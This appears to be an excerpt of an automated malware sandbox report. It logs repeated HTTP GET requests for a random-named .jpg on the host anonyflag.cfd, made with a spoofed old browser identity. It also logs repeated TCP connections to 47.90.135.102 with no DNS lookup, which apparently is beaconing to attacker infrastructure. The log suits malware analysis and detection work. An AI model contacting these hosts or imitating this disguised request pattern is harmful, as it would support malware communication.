        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
